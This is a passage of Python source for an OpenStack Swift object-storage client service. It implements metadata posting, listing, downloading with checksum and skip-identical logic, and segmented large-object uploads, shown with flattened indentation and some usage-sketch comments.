response_dict = {}
headers = split_headers(
options['meta'], 'X-Account-Meta-')
headers.update(
split_headers(options['header'], ''))
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_account_job, headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError('Account not found', exc=err)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
if not objects:
res["action"] = "post_container"
response_dict = {}
headers = split_headers(
options['meta'], 'X-Container-Meta-')
headers.update(
split_headers(options['header'], ''))
if options['read_acl'] is not None:
headers['X-Container-Read'] = options['read_acl']
if options['write_acl'] is not None:
headers['X-Container-Write'] = options['write_acl']
if options['sync_to'] is not None:
headers['X-Container-Sync-To'] = options['sync_to']
if options['sync_key'] is not None:
headers['X-Container-Sync-Key'] = options['sync_key']
res['headers'] = headers
try:
post = self.thread_manager.container_pool.submit(
self._post_container_job, container,
headers, response_dict
)
get_future_result(post)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': response_dict
})
return res
raise SwiftError(
"Container '%s' not found" % container,
container=container, exc=err
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'action': 'post_container',
'success': False,
'error': err,
'response_dict': response_dict,
'traceback': traceback,
'error_timestamp': err_time
})
return res
else:
post_futures = []
post_objects = self._make_post_objects(objects)
for post_object in post_objects:
obj = post_object.object_name
obj_options = post_object.options
response_dict = {}
headers = split_headers(
options['meta'], 'X-Object-Meta-')
# add header options to the headers object for the request.
headers.update(
split_headers(options['header'], ''))
if obj_options is not None:
if 'meta' in obj_options:
headers.update(
split_headers(
obj_options['meta'], 'X-Object-Meta-'
)
)
if 'header' in obj_options:
headers.update(
split_headers(obj_options['header'], '')
)
post = self.thread_manager.object_uu_pool.submit(
self._post_object_job, container, obj,
headers, response_dict
)
post_futures.append(post)
return ResultsIterator(post_futures)
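# Usage sketch for post() (names are illustrative): setting container
# metadata with
#
#   with SwiftService() as swift:
#       res = swift.post(container='photos',
#                        options={'meta': ['Owner:alice']})
#
# sends an X-Container-Meta-Owner header; passing an objects list instead
# returns a ResultsIterator of per-object result dicts.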
@staticmethod
def _make_post_objects(objects):
post_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftPostObject(o)
post_objects.append(obj)
elif isinstance(o, SwiftPostObject):
post_objects.append(o)
else:
raise SwiftError(
"The post operation takes only strings or "
"SwiftPostObjects as input",
obj=o)
return post_objects
@staticmethod
def _post_account_job(conn, headers, result):
return conn.post_account(headers=headers, response_dict=result)
@staticmethod
def _post_container_job(conn, container, headers, result):
try:
res = conn.post_container(
container, headers=headers, response_dict=result)
except ClientException as err:
if err.http_status != 404:
raise
_response_dict = {}
res = conn.put_container(
container, headers=headers, response_dict=_response_dict)
result['post_put'] = _response_dict
return res
@staticmethod
def _post_object_job(conn, container, obj, headers, result):
res = {
'success': True,
'action': 'post_object',
'container': container,
'object': obj,
'headers': headers,
'response_dict': result
}
try:
conn.post_object(
container, obj, headers=headers, response_dict=result)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# List related methods
#
def list(self, container=None, options=None):
"""
List operations on an account or a container.
:param container: The container to make the list operation against.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'long': False,
'prefix': None,
'delimiter': None,
}
:returns: A generator for returning the results of the list operation
on an account or container. Each result yielded from the
generator is either a 'list_account_part' or
'list_container_part', containing part of the listing.
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
rq = Queue(maxsize=10) # Just stop list running away consuming memory
if container is None:
listing_future = self.thread_manager.container_pool.submit(
self._list_account_job, options, rq
)
else:
listing_future = self.thread_manager.container_pool.submit(
self._list_container_job, container, options, rq
)
res = get_from_queue(rq)
while res is not None:
yield res
res = get_from_queue(rq)
# Make sure the future has completed
get_future_result(listing_future)
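# Hedged usage sketch (illustrative only): list() is a generator yielding one
# page of results at a time, so callers iterate and check 'success' per page:
#
#     from swiftclient.service import SwiftService
#
#     with SwiftService() as swift:
#         for page in swift.list(container='images'):
#             if page['success']:
#                 for item in page['listing']:
#                     print(item['name'])
#             else:
#                 raise page['error']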
@staticmethod
def _list_account_job(conn, options, result_queue):
marker = ''
error = None
try:
while True:
_, items = conn.get_account(
marker=marker, prefix=options['prefix']
)
if not items:
result_queue.put(None)
return
if options['long']:
for i in items:
name = i['name']
i['meta'] = conn.head_container(name)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': True,
'listing': items,
'marker': marker,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
except ClientException as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.http_status != 404:
error = (err, traceback, err_time)
else:
error = (
SwiftError('Account not found', exc=err),
traceback, err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_account_part',
'container': None,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
@staticmethod
def _list_container_job(conn, container, options, result_queue):
marker = options.get('marker', '')
error = None
try:
while True:
_, items = conn.get_container(
container, marker=marker, prefix=options['prefix'],
delimiter=options['delimiter']
)
if not items:
result_queue.put(None)
return
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': True,
'marker': marker,
'listing': items,
}
result_queue.put(res)
marker = items[-1].get('name', items[-1].get('subdir'))
except ClientException as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.http_status != 404:
error = (err, traceback, err_time)
else:
error = (
SwiftError(
'Container %r not found' % container,
container=container, exc=err
),
traceback,
err_time
)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
error = (err, traceback, err_time)
res = {
'action': 'list_container_part',
'container': container,
'prefix': options['prefix'],
'success': False,
'marker': marker,
'error': error[0],
'traceback': error[1],
'error_timestamp': error[2]
}
result_queue.put(res)
result_queue.put(None)
# Download related methods
#
def download(self, container=None, objects=None, options=None):
"""
Download operations on an account, optional container and optional list
of objects.
:param container: The container to download from.
:param objects: A list of object names to download (a list of strings).
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'marker': '',
'prefix': None,
'no_download': False,
'header': [],
'skip_identical': False,
'out_directory': None,
'checksum': True,
'out_file': None,
'remove_prefix': False,
'shuffle' : False
}
:returns: A generator for returning the results of the download
operations. Each result yielded from the generator is a
'download_object' dictionary containing the results of an
individual file download.
:raises: ClientException
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if not container:
# Download everything if options['yes_all'] is set
if options['yes_all']:
try:
options_copy = deepcopy(options)
options_copy["long"] = False
for part in self.list(options=options_copy):
if part["success"]:
containers = [i['name'] for i in part["listing"]]
if options['shuffle']:
shuffle(containers)
for con in containers:
for res in self._download_container(
con, options_copy):
yield res
else:
raise part["error"]
# If we see a 404 here, the listing of the account failed
except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError('Account not found', exc=err)
elif objects is None:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
for res in self._download_container(container, options):
yield res
else:
if '/' in container:
raise SwiftError('\'/\' in container name',
container=container)
if options['out_file'] and len(objects) > 1:
options['out_file'] = None
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
for o_down in interruptable_as_completed(o_downs):
yield o_down.result()
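# Hedged usage sketch (illustrative only): download() yields one result dict
# per object, so callers iterate and inspect 'success' as results arrive:
#
#     from swiftclient.service import SwiftService
#
#     with SwiftService() as swift:
#         opts = {'out_directory': '/tmp/images'}
#         for res in swift.download(container='images',
#                                   objects=['logo.png'], options=opts):
#             if not res['success']:
#                 print('download failed:', res['error'])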
def _download_object_job(self, conn, container, obj, options):
out_file = options['out_file']
results_dict = {}
req_headers = split_headers(options['header'], '')
pseudodir = False
path = join(container, obj) if options['yes_all'] else obj
path = path.lstrip(os_path_sep)
options['skip_identical'] = (options['skip_identical'] and
out_file != '-')
if options['prefix'] and options['remove_prefix']:
path = path[len(options['prefix']):].lstrip('/')
if options['out_directory']:
path = os.path.join(options['out_directory'], path)
if options['skip_identical']:
filename = out_file if out_file else path
try:
fp = open(filename, 'rb')
except IOError:
pass
else:
with fp:
md5sum = md5()
while True:
data = fp.read(65536)
if not data:
break
md5sum.update(data)
req_headers['If-None-Match'] = md5sum.hexdigest()
try:
start_time = time()
get_args = {'resp_chunk_size': 65536,
'headers': req_headers,
'response_dict': results_dict}
if options['skip_identical']:
# Assume the file is a large object; if we're wrong, the query
# string is ignored and the If-None-Match header will trigger
# the behavior we want
get_args['query_string'] = 'multipart-manifest=get'
try:
headers, body = conn.get_object(container, obj, **get_args)
except ClientException as e:
if not options['skip_identical']:
raise
if e.http_status != 304: # Only handling Not Modified
raise
headers = results_dict['headers']
if 'x-object-manifest' in headers:
# DLO: most likely it has more than one page worth of
# segments and we have an empty file locally
body = []
elif config_true_value(headers.get('x-static-large-object')):
# SLO: apparently we have a copy of the manifest locally?
# provide no chunking data to force a fresh download
body = [b'[]']
else:
# Normal object: let it bubble up
raise
if options['skip_identical']:
if config_true_value(headers.get('x-static-large-object')) or \
'x-object-manifest' in headers:
# The request was chunked, so stitch it back together
chunk_data = self._get_chunk_data(conn, container, obj,
headers, b''.join(body))
else:
chunk_data = None
if chunk_data is not None:
if self._is_identical(chunk_data, filename):
raise ClientException('Large object is identical',
http_status=304)
# Large objects are different; start the real download
del get_args['query_string']
get_args['response_dict'].clear()
headers, body = conn.get_object(container, obj, **get_args)
headers_receipt = time()
obj_body = _SwiftReader(path, body, headers,
options.get('checksum', True))
no_file = options['no_download']
if out_file == "-" and not no_file:
res = {
'action': 'download_object',
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'contents': obj_body
}
return res
fp = None
try:
content_type = headers.get('content-type', '').split(';', 1)[0]
if content_type in KNOWN_DIR_MARKERS:
make_dir = not no_file and out_file != "-"
if make_dir and not isdir(path):
mkdirs(path)
else:
make_dir = not (no_file or out_file)
if make_dir:
dirpath = dirname(path)
if dirpath and not isdir(dirpath):
mkdirs(dirpath)
if not no_file:
if out_file:
fp = open(out_file, 'wb')
else:
if basename(path):
fp = open(path, 'wb')
else:
pseudodir = True
for chunk in obj_body:
if fp is not None:
fp.write(chunk)
finish_time = time()
finally:
bytes_read = obj_body.bytes_read()
if fp is not None:
fp.close()
if 'x-object-meta-mtime' in headers and not no_file:
try:
mtime = float(headers['x-object-meta-mtime'])
except ValueError:
pass # no real harm; couldn't trust it anyway
else:
if options['out_file']:
utime(options['out_file'], (mtime, mtime))
else:
utime(path, (mtime, mtime))
res = {
'action': 'download_object',
'success': True,
'container': container,
'object': obj,
'path': path,
'pseudodir': pseudodir,
'start_time': start_time,
'finish_time': finish_time,
'headers_receipt': headers_receipt,
'auth_end_time': conn.auth_end_time,
'read_length': bytes_read,
'attempts': conn.attempts,
'response_dict': results_dict
}
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'download_object',
'container': container,
'object': obj,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'path': path,
'pseudodir': pseudodir,
'attempts': conn.attempts
}
return res
def _submit_page_downloads(self, container, page_generator, options):
try:
list_page = next(page_generator)
except StopIteration:
return None
if list_page["success"]:
objects = [o["name"] for o in list_page["listing"]]
if options["shuffle"]:
shuffle(objects)
o_downs = [
self.thread_manager.object_dd_pool.submit(
self._download_object_job, container, obj, options
) for obj in objects
]
return o_downs
else:
raise list_page["error"]
def _download_container(self, container, options):
_page_generator = self.list(container=container, options=options)
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
if err.http_status != 404:
raise
raise SwiftError(
'Container %r not found' % container,
container=container, exc=err
)
error = None
while next_page_downs:
page_downs = next_page_downs
next_page_downs = None
# Start downloading the next page of list results when
# we have completed 80% of the previous page
next_page_triggered = False
next_page_trigger_point = 0.8 * len(page_downs)
page_results_yielded = 0
for o_down in interruptable_as_completed(page_downs):
yield o_down.result()
# Do we need to start the next set of downloads yet?
if not next_page_triggered:
page_results_yielded += 1
if page_results_yielded >= next_page_trigger_point:
try:
next_page_downs = self._submit_page_downloads(
container, _page_generator, options
)
except ClientException as err:
# Allow the current page to finish downloading
logger.exception(err)
error = err
except Exception:
# Something unexpected went wrong - cancel
# remaining downloads
for _d in page_downs:
_d.cancel()
raise
finally:
# Stop counting and testing
next_page_triggered = True
if error:
raise error
# Upload related methods
#
def upload(self, container, objects, options=None):
"""
Upload a list of objects to a given container.
:param container: The container (or pseudo-folder path) to put the
uploads into.
:param objects: A list of file/directory names (strings) or
SwiftUploadObject instances containing a source for the
created object, an object name, and an options dict
(can be None) to override the options for that
individual upload operation::
[
'/path/to/file',
SwiftUploadObject('/path', object_name='obj1'),
...
]
The options dict is as described below.
The SwiftUploadObject source may be one of:
* A file-like object (with a read method)
* A string containing the path to a local
file or directory
* None, to indicate that we want an empty object
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all upload operations
performed by this call, unless overridden on a per
object basis. Possible options are given below::
{
'meta': [],
'header': [],
'segment_size': None,
'use_slo': False,
'segment_container': None,
'leave_segments': False,
'changed': None,
'skip_identical': False,
'fail_fast': False,
'dir_marker': False # Only for None sources
}
:returns: A generator for returning the results of the uploads.
:raises: SwiftError
:raises: ClientException
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
try:
segment_size = int(0 if options['segment_size'] is None else
options['segment_size'])
except ValueError:
raise SwiftError('Segment size should be an integer value')
# In case we have a pseudo-folder path for the <container> arg, derive
# the container name from the top path and prepend the rest to
# the object name. (Same as passing --object-name.)
container, _sep, pseudo_folder = container.partition('/')
# Try to create the container, just in case it doesn't exist. If this
# fails, it might just be because the user doesn't have container PUT
# permissions, so we'll ignore any error. If there's really a problem,
# it'll surface on the first object PUT.
policy_header = {}
_header = split_headers(options["header"])
if POLICY in _header:
policy_header[POLICY] = \
_header[POLICY]
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, container, headers=policy_header)
]
# wait for first container job to complete before possibly attempting
# segment container job because segment container job may attempt
# to HEAD the first container
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
if segment_size:
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
if seg_container != container:
if not policy_header:
# Since no storage policy was specified on the command
# line, rather than just letting swift pick the default
# storage policy, we'll try to create the segments
# container with the same policy as the upload container
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
policy_source=container
)
]
else:
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, seg_container,
headers=policy_header
)
]
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
# We maintain a results queue here and a separate thread to monitor
# the futures because we want to get results back from potential
# segment uploads too
rq = Queue()
file_jobs = {}
upload_objects = self._make_upload_objects(objects, pseudo_folder)
for upload_object in upload_objects:
s = upload_object.source
o = upload_object.object_name
o_opts = upload_object.options
details = {'action': 'upload', 'container': container}
if o_opts is not None:
object_options = deepcopy(options)
object_options.update(o_opts)
else:
object_options = options
if hasattr(s, 'read'):
# We've got a file like object to upload to o
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o, object_options
)
details['file'] = s
details['object'] = o
file_jobs[file_future] = details
elif s is not None:
# We've got a path to upload to o
details['path'] = s
details['object'] = o
if isdir(s):
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options, path=s
)
file_jobs[dir_future] = details
else:
try:
stat(s)
file_future = \
self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, s, o,
object_options, results_queue=rq
)
file_jobs[file_future] = details
except OSError as err:
# Avoid tying up threads with jobs that will fail
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'action': 'upload_object',
'container': container,
'object': o,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'path': s
}
rq.put(res)
else:
# Create an empty object (as a dir marker if is_dir)
details['file'] = None
details['object'] = o
if object_options['dir_marker']:
dir_future = self.thread_manager.object_uu_pool.submit(
self._create_dir_marker_job, container, o,
object_options
)
file_jobs[dir_future] = details
else:
file_future = self.thread_manager.object_uu_pool.submit(
self._upload_object_job, container, StringIO(),
o, object_options
)
file_jobs[file_future] = details
# Start a thread to watch for upload results
Thread(
target=self._watch_futures, args=(file_jobs, rq)
).start()
# yield results as they become available, including those from
# segment uploads.
res = get_from_queue(rq)
cancelled = False
while res is not None:
yield res
if not res['success']:
if not cancelled and options['fail_fast']:
cancelled = True
for f in file_jobs:
f.cancel()
res = get_from_queue(rq)
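# Hedged usage sketch (illustrative only): upload() accepts plain paths or
# SwiftUploadObject instances and yields container-creation, segment and
# object results as they complete:
#
#     from swiftclient.service import SwiftService, SwiftUploadObject
#
#     with SwiftService() as swift:
#         objs = ['photo.jpg',
#                 SwiftUploadObject('data.bin', object_name='renamed.bin')]
#         for res in swift.upload('backups', objs,
#                                 options={'segment_size': 1024 * 1024}):
#             if not res['success']:
#                 print('upload failed:', res['error'])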
@staticmethod
def _make_upload_objects(objects, pseudo_folder=''):
upload_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftUploadObject(o, urljoin(pseudo_folder,
o.lstrip('/')))
upload_objects.append(obj)
elif isinstance(o, SwiftUploadObject):
o.object_name = urljoin(pseudo_folder, o.object_name)
upload_objects.append(o)
else:
raise SwiftError(
"The upload operation takes only strings or "
"SwiftUploadObjects as input",
obj=o)
return upload_objects
@staticmethod
def _create_container_job(
conn, container, headers=None, policy_source=None):
"""
Create a container using the given connection
:param conn: The swift connection used for requests.
:param container: The container name to create.
:param headers: An optional dict of headers for the
put_container request.
:param policy_source: An optional name of a container whose policy we
should duplicate.
:return: A dict containing the results of the operation.
"""
res = {
'action': 'create_container',
'container': container,
'headers': headers
}
create_response = {}
try:
if policy_source is not None:
_meta = conn.head_container(policy_source)
if 'x-storage-policy' in _meta:
policy_header = {
POLICY: _meta.get('x-storage-policy')
}
if headers is None:
headers = policy_header
else:
headers.update(policy_header)
conn.put_container(
container, headers, response_dict=create_response
)
res.update({
'success': True,
'response_dict': create_response
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': create_response
})
return res
@staticmethod
def _create_dir_marker_job(conn, container, obj, options, path=None):
res = {
'action': 'create_dir_marker',
'container': container,
'object': obj,
'path': path
}
results_dict = {}
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
if options['changed']:
try:
headers = conn.head_object(container, obj)
ct = headers.get('content-type', '').split(';', 1)[0]
cl = int(headers.get('content-length'))
et = headers.get('etag')
mt = headers.get('x-object-meta-mtime')
if (ct in KNOWN_DIR_MARKERS and
cl == 0 and
et == EMPTY_ETAG and
mt == put_headers['x-object-meta-mtime']):
res['success'] = True
return res
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
try:
conn.put_object(container, obj, '', content_length=0,
content_type=KNOWN_DIR_MARKERS[0],
headers=put_headers,
response_dict=results_dict)
res.update({
'success': True,
'response_dict': results_dict})
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict})
return res
@staticmethod
def _upload_segment_job(conn, path, container, segment_name, segment_start,
segment_size, segment_index, obj_name, options,
results_queue=None):
results_dict = {}
if options['segment_container']:
segment_container = options['segment_container']
else:
segment_container = container + '_segments'
res = {
'action': 'upload_segment',
'for_container': container,
'for_object': obj_name,
'segment_index': segment_index,
'segment_size': segment_size,
'segment_location': '/%s/%s' % (segment_container,
segment_name),
'log_line': '%s segment %s' % (obj_name, segment_index),
}
try:
fp = open(path, 'rb')
fp.seek(segment_start)
contents = LengthWrapper(fp, segment_size, md5=options['checksum'])
etag = conn.put_object(
segment_container,
segment_name,
contents,
content_length=segment_size,
content_type='application/swiftclient-segment',
response_dict=results_dict)
if options['checksum'] and etag and etag != contents.get_md5sum():
raise SwiftError('Segment {0}: upload verification failed: '
'md5 mismatch, local {1} != remote {2} '
'(remote segment has not been removed)'
.format(segment_index,
contents.get_md5sum(),
etag))
res.update({
'success': True,
'response_dict': results_dict,
'segment_etag': etag,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time,
'response_dict': results_dict,
'attempts': conn.attempts
})
if results_queue is not None:
results_queue.put(res)
return res
def _get_chunk_data(self, conn, container, obj, headers, manifest=None):
chunks = []
if 'x-object-manifest' in headers:
scontainer, sprefix = headers['x-object-manifest'].split('/', 1)
for part in self.list(scontainer, {'prefix': sprefix}):
if part["success"]:
chunks.extend(part["listing"])
else:
raise part["error"]
elif config_true_value(headers.get('x-static-large-object')):
if manifest is None:
headers, manifest = conn.get_object(
container, obj, query_string='multipart-manifest=get')
manifest = parse_api_response(headers, manifest)
for chunk in manifest:
if chunk.get('sub_slo'):
scont, sobj = chunk['name'].lstrip('/').split('/', 1)
chunks.extend(self._get_chunk_data(
conn, scont, sobj, {'x-static-large-object': True}))
else:
chunks.append(chunk)
else:
chunks.append({'hash': headers.get('etag').strip('"'),
'bytes': int(headers.get('content-length'))})
return chunks
def _is_identical(self, chunk_data, path):
try:
fp = open(path, 'rb')
except IOError:
return False
with fp:
for chunk in chunk_data:
to_read = chunk['bytes']
md5sum = md5()
while to_read:
data = fp.read(min(65536, to_read))
if not data:
return False
md5sum.update(data)
to_read -= len(data)
if md5sum.hexdigest() != chunk['hash']:
return False
# Each chunk is verified; check that we're at the end of the file
return not fp.read(1)
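# Sketch of the expected input (inferred from _get_chunk_data above):
# chunk_data is a list of {'hash': <md5 hex>, 'bytes': <length>} dicts, and
# the local file only counts as identical if every segment hash matches the
# corresponding byte range and no trailing bytes remain, e.g.:
#
#     chunk_data = [{'hash': 'd41d8cd98f00b204e9800998ecf8427e', 'bytes': 0}]
#     self._is_identical(chunk_data, '/tmp/empty')  # True only for an empty file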
def _upload_object_job(self, conn, container, source, obj, options,
results_queue=None):
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
res = {
'action': 'upload_object',
'container': container,
'object': obj
}
if hasattr(source, 'read'):
stream = source
path = None
else:
path = source
res['path'] = path
try:
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
# We need to HEAD all objects now in case we're overwriting a
# manifest object and need to delete the old segments
# ourselves.
old_manifest = None
old_slo_manifest_paths = []
new_slo_manifest_paths = set()
segment_size = int(0 if options['segment_size'] is None
else options['segment_size'])
if (options['changed'] or options['skip_identical']
or not options['leave_segments']):
try:
headers = conn.head_object(container, obj)
is_slo = config_true_value(
headers.get('x-static-large-object'))
if options['skip_identical'] or (
is_slo and not options['leave_segments']):
chunk_data = self._get_chunk_data(
conn, container, obj, headers)
if options['skip_identical'] and self._is_identical(
chunk_data, path):
res.update({
'success': True,
'status': 'skipped-identical'
})
return res
cl = int(headers.get('content-length'))
mt = headers.get('x-object-meta-mtime')
if (path is not None and options['changed']
and cl == getsize(path)
and mt == put_headers['x-object-meta-mtime']):
res.update({
'success': True,
'status': 'skipped-changed'
})
return res
if not options['leave_segments']:
old_manifest = headers.get('x-object-manifest')
if is_slo:
for old_seg in chunk_data:
seg_path = old_seg['name'].lstrip('/')
if isinstance(seg_path, text_type):
seg_path = seg_path.encode('utf-8')
old_slo_manifest_paths.append(seg_path)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Merge the command line header options to the put_headers
put_headers.update(split_headers(options['header'], ''))
# Don't do segment job if object is not big enough, and never do
# a segment job if we're reading from a stream - we may fail if we
# go over the single object limit, but this gives us a nice way
# to create objects from memory
if (path is not None and segment_size
and (getsize(path) > segment_size)):
res['large_object'] = True
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
full_size = getsize(path)
segment_futures = []
segment_pool = self.thread_manager.segment_pool
segment = 0
segment_start = 0
while segment_start < full_size:
if segment_start + segment_size > full_size:
segment_size = full_size - segment_start
if options['use_slo']:
segment_name = '%s/slo/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
else:
segment_name = '%s/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
seg = segment_pool.submit(
self._upload_segment_job, path, container,
segment_name, segment_start, segment_size, segment,
obj, options, results_queue=results_queue
)
segment_futures.append(seg)
segment += 1
segment_start += segment_size
segment_results = []
errors = False
exceptions = []
for f in interruptable_as_completed(segment_futures):
try:
r = f.result()
if not r['success']:
errors = True
segment_results.append(r)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
errors = True
exceptions.append((err, traceback, err_time))
if errors:
err = ClientException(
'Aborting manifest creation '
'because not all segments could be uploaded. %s/%s'
% (container, obj))
res.update({
'success': False,
'error': err,
'exceptions': exceptions,
'segment_results': segment_results
})
return res
res['segment_results'] = segment_results
if options['use_slo']:
segment_results.sort(key=lambda di: di['segment_index'])
for seg in segment_results:
seg_loc = seg['segment_location'].lstrip('/')
if isinstance(seg_loc, text_type):
seg_loc = seg_loc.encode('utf-8')
new_slo_manifest_paths.add(seg_loc)
manifest_data = json.dumps([
{
'path': d['segment_location'],
'etag': d['segment_etag'],
'size_bytes': d['segment_size']
} for d in segment_results
])
put_headers['x-static-large-object'] = 'true'
mr = {}
conn.put_object(
container, obj, manifest_data,
headers=put_headers,
query_string='multipart-manifest=put',
response_dict=mr
)
res['manifest_response_dict'] = mr
else:
new_object_manifest = '%s/%s/%s/%s/%s/' % (
quote(seg_container.encode('utf8')),
quote(obj.encode('utf8')),
put_headers['x-object-meta-mtime'], full_size,
options['segment_size'])
if old_manifest and old_manifest.rstrip('/') == \
new_object_manifest.rstrip('/'):
old_manifest = None
put_headers['x-object-manifest'] = new_object_manifest
mr = {}
conn.put_object(
container, obj, '', content_length=0,
headers=put_headers,
response_dict=mr
)
res['manifest_response_dict'] = mr
else:
res['large_object'] = False
obr = {}
if path is not None:
content_length = getsize(path)
contents = LengthWrapper(open(path, 'rb'),
content_length,
md5=options['checksum'])
else:
content_length = None
contents = ReadableToIterable(stream,
md5=options['checksum'])
etag = conn.put_object(
container, obj, contents,
content_length=content_length, headers=put_headers,
response_dict=obr
)
res['response_dict'] = obr
if (options['checksum'] and
etag and etag != contents.get_md5sum()):
raise SwiftError('Object upload verification failed: '
'md5 mismatch, local {0} != remote {1} '
'(remote object has not been removed)'
.format(contents.get_md5sum(), etag))
if old_manifest or old_slo_manifest_paths:
drs = []
delobjsmap = {}
if old_manifest:
scontainer, sprefix = old_manifest.split('/', 1)
sprefix = sprefix.rstrip('/') + '/'
delobjsmap[scontainer] = []
for part in self.list(scontainer, {'prefix': sprefix}):
if not part["success"]:
raise part["error"]
delobjsmap[scontainer].extend(
seg['name'] for seg in part['listing'])
if old_slo_manifest_paths:
for seg_to_delete in old_slo_manifest_paths:
if seg_to_delete in new_slo_manifest_paths:
continue
scont, sobj = \
seg_to_delete.split(b'/', 1)
delobjs_cont = delobjsmap.get(scont, [])
delobjs_cont.append(sobj)
delobjsmap[scont] = delobjs_cont
del_segs = []
for dscont, dsobjs in delobjsmap.items():
for dsobj in dsobjs:
del_seg = self.thread_manager.segment_pool.submit(
self._delete_segment, dscont, dsobj,
results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
drs.append(del_seg.result())
res['segment_delete_results'] = drs
# return dict for printing
res.update({
'success': True,
'status': 'uploaded',
'attempts': conn.attempts})
return res
except OSError as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.errno == ENOENT:
error = SwiftError('Local file %r not found' % path, exc=err)
else:
error = err
res.update({
'success': False,
'error': error,
'traceback': traceback,
'error_timestamp': err_time
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Delete related methods
#
def delete(self, container=None, objects=None, options=None):
"""
Delete operations on an account, optional container and optional list
of objects.
:param container: The container to delete or delete from.
:param objects: The list of objects to delete.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'leave_segments': False,
'prefix': None,
}
:returns: A generator for returning the results of the delete
operations. Each result yielded from the generator is either
a 'delete_container', 'delete_object', 'delete_segment', or
'bulk_delete' dictionary containing the results of an
individual delete operation.
:raises: ClientException
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
